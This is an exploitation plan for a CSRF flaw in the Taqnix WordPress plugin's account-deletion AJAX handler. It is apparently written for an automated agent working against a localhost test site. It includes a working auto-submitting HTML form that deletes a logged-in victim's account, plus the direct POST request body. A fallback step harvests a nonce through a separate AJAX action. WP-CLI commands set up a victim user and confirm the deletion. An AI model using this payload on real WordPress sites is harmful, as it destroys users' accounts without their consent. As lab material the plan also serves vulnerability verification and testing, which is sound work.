Exploitation Research Plan: CVE-2026-3565 (Taqnix Account Deletion CSRF)

1. Vulnerability Summary

The Taqnix plugin for WordPress (versions <= 1.0.3) contains a Cross-Site Request Forgery (CSRF) vulnerability in its account deletion functionality. The AJAX handler taqnix_delete_my_account() fails to perform nonce verification because the check_ajax_referer() call is explicitly commented out (specifically on line 883 of the source file containing the user account logic). This allows an attacker to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to visit a malicious page or click a link.

2. Attack Vector Analysis

• AJAX Action: taqnix_delete_my_account
• Endpoint: admin-ajax.php (typically /wp-admin/admin-ajax.php)
• Method: POST (though admin-ajax.php may also process GET)
• Parameters:
  • action: taqnix_delete_my_account
• Authentication Level: Required (The victim must be a logged-in user, typically a non-administrator like a Subscriber or Customer).
• Preconditions: The victim must have an active session on the target WordPress site.

3. Code Flow

1. Action Registration: The plugin likely registers the AJAX handler for logged-in users:
   add_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));
2. Handler Execution: When a request is sent to admin-ajax.php with the action taqnix_delete_my_account, WordPress executes the taqnix_delete_my_account() function.
3. Missing Check: Inside taqnix_delete_my_account() (line 883), the security check is commented out:
   // check_ajax_referer( 'taqnix_action', 'security' );
4. Sink: The function proceeds to identify the current user via get_current_user_id() and invokes account deletion logic (likely wp_delete_user()), causing the authenticated user's account to be removed from the database.

4. Nonce Acquisition Strategy

According to the vulnerability description, no nonce is required for this exploit because the check is explicitly commented out.

However, if a specific test environment has been patched or if the agent needs to verify the registration of the action, nonces for other Taqnix actions are localized or available via the taqnix_nonce AJAX action defined in public/class-taqnix-config 3.03.50 PM.php:

• AJAX Action: taqnix_nonce
• Function: get_taqnix_nonce() -> get_nonce()
• JS Variable (Localised): Often found in taqnix_action key if the plugin enqueues its config.

Confirmation Method:

1. Navigate to the homepage or a product page as a logged-in user.
2. Check for localized scripts using browser_eval:
   browser_eval("window.taqnix_nonce || window.taqnix_config")
3. If the vulnerability exists as described, attempts to call the taqnix_delete_my_account action without a security or _wpnonce parameter will succeed.

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can cause a logged-in user to delete their account.

Step 1: Verification (Direct Request)

As a logged-in victim (e.g., user victim_user), send a POST request directly to the AJAX endpoint.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body: action=taqnix_delete_my_account

Step 2: CSRF PoC Generation

Create an HTML page that auto-submits a form to the target endpoint.

<html>
  <body>
    <h1>Processing...</h1>
    <form id="csrf-form" action="http://localhost:8080/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="taqnix_delete_my_account" />
    </form>
    <script>
      document.getElementById('csrf-form').submit();
    </script>
  </body>
</html>

6. Test Data Setup

1. Create Victim User:
   wp user create victim_user victim@example.com --role=subscriber --user_pass=password123
2. Plugin Activation: Ensure Taqnix is active.
3. Login: The agent must simulate the victim being logged in (using browser_navigate and browser_type to log in as victim_user).

7. Expected Results

• Response: The server should return a JSON success message (e.g., {"success":true} or a 200 OK response with specific plugin output).
• Behavior: The victim_user account should be deleted from the WordPress database.

8. Verification Steps

1. Check User Status: After the exploit request, attempt to verify the user exists via WP-CLI:
   wp user get victim_user
2. Expected Outcome: The command should return an error: Error: Invalid user ID, email or login: 'victim_user'.
3. Database Check: Verify the wp_users table directly:
   wp db query "SELECT ID, user_login FROM wp_users WHERE user_login = 'victim_user';"
   (Expected: No results).

9. Alternative Approaches

If the plugin logic requires specific parameters (like a confirmation flag) that were not mentioned in the description, analyze the taqnix_delete_my_account handler (if found during the exploit attempt) for additional required POST keys.

If a nonce is actually required in the specific version being tested (despite the description), use the taqnix_nonce action to retrieve a valid nonce:

1. http_request(url=".../wp-admin/admin-ajax.php?action=taqnix_nonce", method="POST")
2. Extract the taqnix_action nonce from the JSON response.
3. Include security=[nonce] in the account deletion payload. (Note: This would change the vulnerability from CSRF to a simple Lack of Capability Check/Nonce Leak).